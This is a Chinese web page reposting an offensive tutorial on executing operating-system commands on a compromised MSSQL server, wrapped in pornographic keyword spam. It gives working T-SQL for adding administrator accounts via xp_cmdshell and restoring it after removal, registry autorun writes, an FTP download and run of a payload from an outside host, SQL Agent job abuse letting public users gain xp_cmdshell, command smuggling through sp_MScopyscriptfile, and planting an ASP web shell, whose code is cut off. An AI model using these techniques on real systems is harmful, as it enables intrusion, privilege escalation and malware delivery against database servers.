亚洲免费不卡_在线视频精品_国产尤物精品_久久久久网址_久久精品91_欧美va天堂在线_狠狠入ady亚洲精品_亚洲午夜精品福利_国产精品草草_午夜精品久久99蜜桃的功能介绍

怎樣在MSSQL執(zhí)行命令
來源:易賢網(wǎng) 閱讀:3128 次 日期:2014-11-03 10:09:40
溫馨提示:易賢網(wǎng)小編為您整理了“怎樣在MSSQL執(zhí)行命令”,方便廣大網(wǎng)友查閱!

假設(shè)一臺主機開了1433端口我們已通過SQL注入或是空弱密碼遠程連接

能有哪些辦法加一個系統(tǒng)管理員用戶呢(或是執(zhí)行系統(tǒng)命令)

1).XP_CMDSHELL 'cmd.exe /c net user aaa bbb /add'

人人都知道的辦法,最大的好處是有回顯,但是最怕

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

通過上面的T-SQL語句就可以把這個擴展儲存刪了

我們一般可以用

2k:

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL97:

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'

就還原了.

但是有的人知道sp_addextendedproc也只不過是一個儲存過程一樣可以刪除的

Drop PROCEDURE sp_addextendedproc

if exists (select * from

dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and

OBJECTPROPERTY(id, N'IsExtendedProc') = 1)

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

還原:

create procedure sp_addextendedproc --- 1996/08/30 20:13

@functname nvarchar(517),/* (owner.)name of function to call */

@dllname varchar(255)/* name of DLL containing function */

as

set implicit_transactions off

if @@trancount > 0

begin

raiserror(15002,-1,-1,'sp_addextendedproc')

return (1)

end

/*

** Create the extended procedure mapping.

*/

dbcc addextendedproc( @functname, @dllname)

return (0) -- sp_addextendedproc

呀呀寫了這么多其實有個最簡單的保護辦法:

先NET stop mssqlserver,然后把xplog70.dll(SQL97下用xpsql70.dll)刪了

再把服務(wù)打開就可以了

2)看了上面的你就明白了xp_cmdshell最終是可以被刪除的沒別的辦法了嗎?

有寫注冊表三:

xp_regwrite 'HKEY_LOCAL_MacHINE','SOFTWAREMicrosoftWindowscurrentversionrun', 'czy82','REG_SZ', net user czy bb /add

其實注冊表還有好幾個地方可以寫的比如說注冊表中的WEB瀏覽設(shè)置

用寫注冊表的辦法不好的地方是不但沒有回顯而且不能馬上運行實不實用我也不知道了

3)

declare @s int

exec sp_oacreate "wscript.shell",@s out

--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo open ASP.7i24.com>c:a.txt"

--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:a.txt"

--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo 123321>>c:a.txt"

--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo get server.exe>>c:a.txt"

--exec sp_oamethod @s,"run",NULL,"cmd.exe /c echo close>>c:a.txt"

--exec sp_oamethod @s,"run",NULL,"cmd.exe /c ftp -s:c:a.txt"

exec sp_oamethod @s,"run",NULL,"cmd.exe /c server"

對了正如你看到的我們還可以使用sp_oacreate和sp_oamethod在它們的作用下我們可以

調(diào)用系統(tǒng)的控件比如說fso,wsh,shell什么的,但是有個問題是并不能象xp_cmdshell那樣

馬上看到結(jié)果真的不能嗎看下面的:

declare @s int,@o int ,@f int,@str nvarchar(4000)

/*exec sp_oacreate "wscript.shell",@s out

exec sp_oamethod @s,"run",NULL,"cmd.exe /c net user>c:temp.txt"*/

exec sp_oacreate "scripting.filesystemobject", @o out

exec sp_oamethod @o, "opentextfile", @f out,"c:temp.txt", 1

exec sp_oamethod @f, "readall",@str out

print @str

先執(zhí)行注解內(nèi)的然后執(zhí)行外面的其實原理很簡單就是利用>把結(jié)果寫到一個文件中然后用

fso來讀出來!很實用的

4)

use msdb; --這兒不要是master喲

exec sp_add_job @job_name='czy82';

exec sp_add_jobstep @job_name='czy82',@step_name = 'Exec my sql',@subsystem='CMDEXEC',@command='dir c:>c:b.txt';

exec sp_add_jobserver @job_name = 'czy82',@server_name = 'smscomputer';

exec sp_start_job @job_name='czy82';

利用MSSQL的作業(yè)處理也是可以執(zhí)行命令的而且如果上面的subsystem的參數(shù)是tsql后面的我們就可以

執(zhí)行tsql語句了.

對于這幾個儲存過程的使用第一在@server_name我們要指定你的sql的服務(wù)器名

第二系統(tǒng)的sqlserveragent服務(wù)必須打開(默認沒打開的氣人了吧)

net start SQLSERVERAGENT

對于這個東東還有一個地方不同就是public也可以執(zhí)行..同這兒也是有系統(tǒng)洞洞的看下面的

USE msdb

EXEC sp_add_job @job_name = 'GetSystemOnSQL',

@enabled = 1,

@description = 'This will give a low privileged user Access to

xp_cmdshell',

@delete_level = 1

EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL',

@step_name = 'Exec my sql',

@subsystem = 'TSQL',

@command = 'exec master..xp_execresultset N''select ''''exec

master..xp_cmdshell "dir > c:agent-job-results.txt"'''''',N''Master'''

EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL',

@server_name = '你的SQL的服務(wù)器名'

EXEC sp_start_job @job_name = 'GetSystemOnSQL'

不要懷疑上面的代碼我是測試成功了的!這兒我們要注意xp_execresultset就是因為它所以

才讓我們可以以public執(zhí)行xp_cmdshell

5)關(guān)于Microsoft SQL Agent Jobs任意文件可刪除覆蓋漏洞(public用戶也可以)

在安焦有文章:http://www.xfocus.net/vuln/vul_view.PHP?vul_id=2968

USE msdb

EXEC sp_add_job @job_name = 'ArbitraryFileCreate',

@enabled = 1,

@description = 'This will create a file called c:sqlafc123.txt',

@delete_level = 1

EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate',

@step_name = 'SQLA

FC',

@subsystem = 'TSQL',

@command = 'select ''hello, this file was created by the SQL Agent.''',

@output_file_name = 'c:sqlafc123.txt'

EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate',

@server_name = 'SERVER_NAME'

EXEC sp_start_job @job_name = 'ArbitraryFileCreate'

如果subsystem選的是:tsql在生成的文件的頭部有如下內(nèi)容

??揂rbitraryFileCreate? ? 1 ?,揝QLAFC? ???? 2003-02-07 18:24:19

----------------------------------------------

hello, this file was created by the SQL Agent.

(1 ?????)

所以我建議要生成文件最好subsystem選cmdexec,如果利用得好我們可以寫一個有添加管理員

命令的VBs文件到啟動目錄!

6)關(guān)于sp_makewebtask(可以寫任意內(nèi)容任意文件名的文件)

關(guān)于sp_MScopyscriptfile 看下面的例子

declare @command varchar(100)

declare @scripfile varchar(200)

set concat_null_yields_null off

select @command='dir c: > "attackeripsharedir.txt"'

select @scripfile='c:autoexec.bat > nul" | ' + @command + ' | rd "'

exec sp_MScopyscriptfile @scripfile ,''

這兩個東東都還在測試試喲

讓MSSQL的public用戶得到一個本機的web shell:)

sp_makewebtask @outputfile='d:smsa.asp',@charset=gb2312,

--@query='select '''''

--@query='select '''' '

@query='select ''

" method="POST">

更多信息請查看IT技術(shù)專欄

更多信息請查看數(shù)據(jù)庫
下一篇:SQL高級查詢
易賢網(wǎng)手機網(wǎng)站地址:怎樣在MSSQL執(zhí)行命令
由于各方面情況的不斷調(diào)整與變化,易賢網(wǎng)提供的所有考試信息和咨詢回復僅供參考,敬請考生以權(quán)威部門公布的正式信息和咨詢?yōu)闇剩?/div>
關(guān)于我們 | 聯(lián)系我們 | 人才招聘 | 網(wǎng)站聲明 | 網(wǎng)站幫助 | 非正式的簡要咨詢 | 簡要咨詢須知 | 新媒體/短視頻平臺 | 手機站點

版權(quán)所有:易賢網(wǎng)

亚洲免费不卡_在线视频精品_国产尤物精品_久久久久网址_久久精品91_欧美va天堂在线_狠狠入ady亚洲精品_亚洲午夜精品福利_国产精品草草_午夜精品久久99蜜桃的功能介绍
亚洲一区日韩| 国产精品啊v在线| 欧美三级小说| 亚洲国产精品123| 免费视频一区| 亚洲高清视频一区| 麻豆久久精品| 亚洲另类黄色| 欧美成人高清| 国产日韩一区欧美| 欧美精品网站| 翔田千里一区二区| 91久久黄色| 久久精品女人天堂| 亚洲日本黄色| 好看的av在线不卡观看| 国产精品亚洲综合| 在线欧美视频| 国产一区二区中文| 美女久久一区| 亚洲影视在线| 国产日韩一区欧美| 亚洲日本视频| 亚洲国产片色| 亚洲国产专区校园欧美| 国产自产精品| 国产精品国产三级欧美二区| 久久亚洲图片| 亚洲综合欧美| 国产九区一区在线| 中国成人在线视频| 91久久亚洲| 亚洲福利精品| 雨宫琴音一区二区在线| 狠狠色噜噜狠狠狠狠色吗综合| 另类图片国产| 美女91精品| 久久人人97超碰人人澡爱香蕉| 国产亚洲网站| 欧美一区=区| 久久精品电影| 欧美不卡三区| 亚洲视频在线二区| 激情五月***国产精品| 国产精品国产亚洲精品看不卡15| 午夜日韩福利| 精品二区视频| 国产亚洲激情| 久久精品中文字幕一区二区三区| 久久aⅴ乱码一区二区三区| 美女被久久久| 欧美体内she精视频在线观看| 欧美日韩综合另类| 91久久久一线二线三线品牌| 亚洲狼人精品一区二区三区| 国产欧美日韩一区二区三区在线| 亚洲一区日韩| 欧美视频在线观看| 99精品国产福利在线观看免费 | 亚洲欧美一区二区原创| 六月婷婷久久| 欧美国产激情| 日韩视频一区二区三区在线播放免费观看| 国内精品**久久毛片app| 在线电影一区| 亚洲欧美高清| 欧美日韩一区二区高清| 亚洲视频观看| 国产伦理一区| 欧美日韩一区二区视频在线观看| 亚洲激情婷婷| 免费在线成人av| 国产精品大片免费观看| 99成人精品| 午夜天堂精品久久久久| 一二三区精品| 午夜久久美女| 国产农村妇女毛片精品久久莱园子| 老牛国产精品一区的观看方式| 国产精品av一区二区| 亚洲二区免费| 欧美精品大片| 午夜亚洲激情| 亚洲高清二区| 欧美一区亚洲二区| 国产一级一区二区| 永久久久久久| 欧美天天视频| 男人的天堂亚洲在线| 亚洲国产专区| 黑人中文字幕一区二区三区| 久久国产欧美精品| 99国内精品| 伊人精品在线| 午夜精品剧场| 欧美亚洲免费| 国产视频在线观看一区 | 久久综合影视| 亚洲国产高清一区二区三区| 欧美在线二区| 欧美在线看片| 久久蜜桃精品| 免费日韩一区二区| 国产欧美一级| 99精品欧美| 激情欧美日韩一区| 狠狠入ady亚洲精品经典电影| 蜜桃av久久久亚洲精品| 国产伦精品一区| 国产精品久久久亚洲一区| 亚洲毛片在线| 99re国产精品| 亚洲色图自拍| 国产精品久久久久毛片大屁完整版| 亚洲国产精品第一区二区| 欧美日韩一区二区三| 欧美激情91| 欧美三级黄美女| 国内自拍一区| 亚洲激情不卡| 国产手机视频一区二区| 亚洲免费网址| 欧美成人69av| 国内揄拍国内精品久久| 亚洲成色最大综合在线| 亚洲欧洲日本国产| 国产亚洲精品v| 亚洲欧美久久久久一区二区三区| 久久av一区二区| 久久人人97超碰人人澡爱香蕉 | 亚洲性感美女99在线| 国产一区视频在线观看免费| 黄色av成人| 国产欧美一区二区色老头| 国产乱人伦精品一区二区| 久久亚洲不卡| 亚洲高清毛片| 每日更新成人在线视频| 欧美日韩 国产精品| 伊人久久亚洲热| 国产伦精品一区二区三区视频孕妇| 亚洲综合二区| 一区久久精品| 久久久久久网| 亚洲精品一级| 欧美成人综合一区| 妖精视频成人观看www| 久久亚洲精品欧美| 激情久久中文字幕| 午夜在线观看免费一区| 国产精品v欧美精品v日韩精品| 好吊视频一区二区三区四区 | 欧美另类女人| 亚洲三级国产| 欧美成人dvd在线视频| 亚洲精品偷拍| 欧美+日本+国产+在线a∨观看| 精品成人一区| 玖玖在线精品| 国产精品一级| 影音先锋国产精品| 亚洲欧美影院| 噜噜噜躁狠狠躁狠狠精品视频| 国产精品v亚洲精品v日韩精品| 国产精品入口66mio| 精品动漫3d一区二区三区免费版| 麻豆av一区二区三区| 99国内精品| 在线精品在线| 亚洲天堂久久| 欧美视频四区| 亚洲欧美一区二区原创| 久久国产日本精品| 国产视频欧美| 亚洲人成网站在线观看播放| 国内精品久久久久国产盗摄免费观看完整版| 国产精品乱看| 国产精品普通话对白| 在线成人h网| 激情婷婷亚洲| 在线精品亚洲一区二区| 国产中文一区二区| 欧美日韩国产综合在线| 欧美不卡一区| 欧美区国产区| 久久裸体视频| 久久久福利视频| 亚洲在线播放| 亚久久调教视频| 久久aⅴ国产紧身牛仔裤| 性伦欧美刺激片在线观看| 亚洲制服av| 欧美一区二区视频在线| 久久国产欧美精品| 老**午夜毛片一区二区三区| 玖玖在线精品| 国产一区视频观看| 亚洲无线视频| 国产欧美综合一区二区三区| 亚洲中午字幕| 欧美理论在线| 亚洲第一在线| 午夜一区二区三区不卡视频| 久久精品日韩欧美| 国产专区一区| 国产欧美日本| 午夜精品久久| 亚洲伦伦在线| 美女国产精品| 亚洲一级黄色| 国产精品美女久久久| 久久亚洲欧美| 一区在线视频观看| 亚洲欧美日韩在线综合| 欧美精品18| 日韩亚洲国产精品| 久久人人精品| 亚洲激情一区| 欧美不卡视频| 一区二区免费在线视频| 欧美成人dvd在线视频| 亚洲国产精品日韩| 久久亚洲国产精品一区二区 | 久久精品人人| 欧美激情综合色综合啪啪| 亚洲成色精品| 久热精品在线| 亚洲精品国产系列| 欧美一区亚洲| 国产欧美日韩综合一区在线观看 | 精品成人免费| 亚洲一区bb| 狠狠色综合网| 欧美专区一区二区三区| 欧美日本国产精品| 亚洲欧美bt| 在线观看亚洲| 欧美日本不卡| 香蕉久久夜色精品国产| 亚洲精品社区| 国精品一区二区三区| 久久大逼视频| 亚洲久久一区| 亚洲国产裸拍裸体视频在线观看乱了中文| 久久本道综合色狠狠五月| 日韩午夜精品| 在线播放精品| 精品91在线| 狠狠综合久久av一区二区老牛| 久久久99国产精品免费| 国产精品一页| 国产精品一卡| 国产一区二区高清视频| 亚洲欧洲一级| 亚洲美女91| 亚洲狼人精品一区二区三区| 亚洲午夜av| 亚洲第一区色| 亚洲人妖在线| 99视频在线精品国自产拍免费观看| 国内精品久久久久久久影视麻豆| 午夜电影亚洲| 欧美fxxxxxx另类| 欧美激情视频一区二区三区在线播放| 麻豆成人精品| 欧美69视频| 欧美午夜精品理论片a级大开眼界 欧美午夜精品久久久久免费视 | 国产精品日韩| 国产精品久久久久久久久久直播 | 久久久久一区| 久久精品女人的天堂av| 鲁大师成人一区二区三区| 久久国产日本精品| 久久青青草原一区二区| 欧美国产另类| 一区福利视频| 国产欧美日韩视频一区二区三区| 日韩午夜精品| 亚洲一区二区三区高清不卡| 性欧美长视频| 欧美性色综合| 99精品欧美一区二区三区| 国产精品久久久对白| 麻豆久久久9性大片| 午夜精品视频在线观看一区二区| 欧美午夜不卡| 99视频精品| 久久久亚洲一区| 国自产拍偷拍福利精品免费一| 亚洲一二三区精品| 国产日韩亚洲| 欧美另类视频在线| 在线观看一区视频| 性色一区二区三区| 国产尤物精品| 亚欧成人精品| 极品少妇一区二区三区| 亚洲一区3d动漫同人无遮挡| 亚洲欧美在线网| 国产欧美另类| 欧美日韩精品免费观看视频完整 | 欧美日韩久久| 国产欧美日韩一区| 欧美日韩一区二区三区在线观看免| 亚洲精品一级| 欧美日韩岛国| 在线一区视频| 狠狠综合久久av一区二区老牛| 国产日韩欧美三区| 国产精品国产三级欧美二区| 亚洲一区二区伦理| 欧美先锋影音| 久久婷婷国产综合尤物精品| 亚洲美女黄网| 国内精品福利| 欧美va天堂在线| 性伦欧美刺激片在线观看| 亚洲高清视频一区| 欧美日韩综合另类| 久久男女视频| 性刺激综合网| 国产伦精品一区二区三区四区免费 | 香蕉久久久久久久av网站| 伊人激情综合| 欧美精品国产一区二区| 美女久久一区| 国产伦精品一区| 一区二区三区欧美成人| 亚洲成色最大综合在线| 国产精品av一区二区| 女人色偷偷aa久久天堂| 久久精品首页| 国产伦一区二区三区色一情| 99国内精品久久久久久久软件| 国产伊人精品| 狠狠88综合久久久久综合网| 欧美日韩国产色综合一二三四| 欧美~级网站不卡| 欧美在线3区| 欧美破处大片在线视频| 欧美日本韩国在线| 国产精品a级| 激情婷婷欧美| 亚洲另类视频| 国产精品日韩欧美一区| 国产精品久久久久久模特| 国产精品久久国产愉拍| 亚洲专区一区| 你懂的一区二区| 国产精品分类| 亚洲日韩视频| 在线视频日韩| 亚洲中午字幕| 欧美阿v一级看视频| 欧美午夜久久| 日韩午夜在线| 亚洲欧美精品| 欧美日本不卡| 在线观看成人av电影| 一本色道久久综合| 久久国产精品久久w女人spa| 女人天堂亚洲aⅴ在线观看| 国产精品a级| 在线视频精品一区| 久久国产日韩| 亚洲午夜精品久久| 99精品99| 久久国产高清| 国产一区清纯| 国产精品人人爽人人做我的可爱| 久久久久在线| 国产精品二区三区四区| 日韩一级在线| 欧美在线日韩精品| 亚洲欧洲一区二区天堂久久| 欧美一级久久| 黑人一区二区三区四区五区| 国产欧美日韩综合精品二区| 亚欧美中日韩视频| 精品动漫3d一区二区三区免费版| 国产欧美亚洲日本| 国产精品大片| 免费精品视频| 亚洲久久一区| 国产在线欧美| 久久激情一区| 亚洲毛片一区| 国产综合精品一区| 亚洲尤物精选| 99亚洲一区二区| 黄页网站一区| 午夜精品一区二区三区四区 | 国产精品腿扒开做爽爽爽挤奶网站| 欧美aa国产视频| 亚洲一区精品视频| 亚洲黄色av| 欧美精品免费观看二区| 先锋影音一区二区三区| 亚洲精品美女久久7777777| 欧美精品午夜|